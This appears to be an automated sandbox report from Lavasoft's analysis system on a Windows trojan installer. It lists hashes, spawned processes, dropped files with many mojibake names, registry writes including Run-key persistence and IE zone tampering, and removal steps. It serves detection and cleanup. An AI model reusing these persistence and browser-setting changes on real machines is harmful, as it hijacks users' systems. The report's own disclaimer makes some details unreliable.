Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a31d77c4941277b89798cb0197973ae4
SHA1: 6ca7be3bd02363228ceee06b9884df2f7438b949
SHA256: 00affff4ba47d45a04b15bf1c57996efd18f200c0b499dfd8c8c69725688fdb0
SSDeep: 12288:LyXZZthSgM0WupPJdBxrXWT60EQHnxGuT/MI6CV44o:LyXnSgMF4dBxYjkuT/wA44o
Size: 628600 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
install.exe:352
OneDay.exe:340
ksimekusu_zhim_007.exe:680
KS21860.exe:136
%original file name%.exe:1540
CreateShortcut.exe:1500
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process OneDay.exe:340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
The process ksimekusu_zhim_007.exe:680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄÖ®ÃÂÂÇË«Æ´.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (826 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶ÌìË«Æ´.ini (912 bytes)
%Program Files%\KS2015010306\V21860\imeunit.exe (4992 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
%Program Files%\KS2015010306\V21860\msvcr100.dll (25824 bytes)
%Program Files%\KS2015010306\V21860\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015010306\V21860\install.exe (1856 bytes)
%Program Files%\KS2015010306\V21860\imetool.exe (6360 bytes)
%Program Files%\KS2015010306\V21860\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥Ãâ€â€ÃƒÆ’–.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Program Files%\KS2015010306\V21860\msvcp100.dll (14184 bytes)
%Program Files%\KS2015010306\V21860\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABCË«Æ´.ini (686 bytes)
%Program Files%\KS2015010306\V21860\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Program Files%\KS2015010306\V21860\DirectUI.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOSË«Æ´.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÃÂÂÞ¸´.lnk (834 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Program Files%\KS2015010306\V21860\KS21860.exe (7192 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄ·ûºÅ.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ë«Æ´.ini (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\öÃâ€ÂØ.lnk (621 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼ÓË«Æ´.ini (538 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂË«Æ´.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ãâ€â€ÃƒÆ’â€ÂÈ»ÂëË«Æ´.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Program Files%\KS2015010306\V21860\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\KS2015010306\V21860\config.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB9.tmp (285959 bytes)
%Program Files%\KS2015010306\V21860\Library.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\nsis.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB8.tmp (0 bytes)
The process %original file name%.exe:1540 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\appbd.txt (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\ksimekusu_zhim_007.exe (229152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Browser_V3.0.1354.0_r_4182_(Build14092214).exe (314625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\CreateShortcut.exe (13850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\OneDay.exe (122112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB3.tmp (19754 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nshB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp (0 bytes)
The process CreateShortcut.exe:1500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyB6.tmp (13218 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\hao123ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\°®ÌÃâ€Â±¦.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsyB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB5.tmp (0 bytes)
Registry activity
The process install.exe:352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Ime File" = "KSIME.IME"
"Layout File" = "kbdus.dll"
[HKU\.DEFAULT\Keyboard Layout\Preload]
"2" = "E0200804"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Layout" = "E0200804"
[HKCU\Keyboard Layout\Preload]
"2" = "E0200804"
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout Text" = "快速拼音输入法"
The process OneDay.exe:340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 3C 26 09 AE 4C D6 81 3D 76 EC 90 33 7C CD A4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
The process ksimekusu_zhim_007.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Qudao" = "ksimekusu_zhim_007"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsxBA.tmp\nsis.dll,"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Count" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Proc" = "KS21860.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayIcon" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
[HKCR\JiSu.file\DefaultIcon]
"(Default)" = "%Program Files%\KS2015010306\V21860\config.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 12 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"UninstallString" = "%Program Files%\KS2015010306\V21860\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"date" = "20150103"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayName" = "¿ìËÙÆ´ÒôÊäÈë·¨ 3.0.3.9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\JiSu.file\shell\open\command]
"(Default)" = "%Program Files%\KS2015010306\V21860\config.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\.wlb]
"(Default)" = "JiSu.file"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"Publisher" = "cxmx, Inc."
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\JiSu.file\shell\open]
"(Default)" = "°²Ãâ€â€Ãƒâ€šÃ‚°Ãƒâ€â€ÃƒÆ’–¿â"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"DisplayVersion" = "3.0.3.9"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"InstallDir" = "%Program Files%\KS2015010306\V21860"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\¿ìËÙÆ´ÒôÊäÈë·¨]
"URLInfoAbout" = "http://jiguangshurufa.com/"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 02 B8 43 E3 78 D1 81 C9 07 81 0C 9E 6F 97 7E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\JiSu.file]
"(Default)" = "Ãâ€â€ÃƒÆ’–¿âÎļþ (.wlb)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ksinput.exe]
"(Default)" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\JiSu.file\shell]
"(Default)" = "open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Entry" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process KS21860.exe:136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 F7 4D 38 C6 D9 56 01 BE E1 BF 88 AD 61 87 06"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Config" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
"Count" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"CRand" = "903"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process %original file name%.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 88 C8 C6 4E BF 5E 62 D1 E8 C0 D0 FB BF 07 30"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process CreateShortcut.exe:1500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 50 A3 89 D3 22 50 E5 DA C4 CB 38 09 66 2D 34"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
Dropped PE files
| MD5 | File path |
|---|---|
| 9ec7343e965f1f5da63daa34515be40e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\CreateShortcut.exe |
| 678e0ebb76fd1af1fce5ac082d682f94 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\Furt.exe |
| 254f13dfd61c5b7d2119eb2550491e1d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\NSISdl.dll |
| cba2bb678b7095db0d11c997c953903c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\OneDay.exe |
| 144bd6f3a3e1e040ffb03648e49c366d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nscB4.tmp\ksimekusu_zhim_007.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
install.exe:352
OneDay.exe:340
ksimekusu_zhim_007.exe:680
KS21860.exe:136
%original file name%.exe:1540
CreateShortcut.exe:1500 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄÖ®ÃÂÂÇË«Æ´.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (826 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶ÌìË«Æ´.ini (912 bytes)
%Program Files%\KS2015010306\V21860\imeunit.exe (4992 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
%Program Files%\KS2015010306\V21860\msvcr100.dll (25824 bytes)
%Program Files%\KS2015010306\V21860\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015010306\V21860\install.exe (1856 bytes)
%Program Files%\KS2015010306\V21860\imetool.exe (6360 bytes)
%Program Files%\KS2015010306\V21860\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥Ãâ€â€ÃƒÆ’–.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Program Files%\KS2015010306\V21860\msvcp100.dll (14184 bytes)
%Program Files%\KS2015010306\V21860\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABCË«Æ´.ini (686 bytes)
%Program Files%\KS2015010306\V21860\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Program Files%\KS2015010306\V21860\DirectUI.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOSË«Æ´.ini (674 bytes)
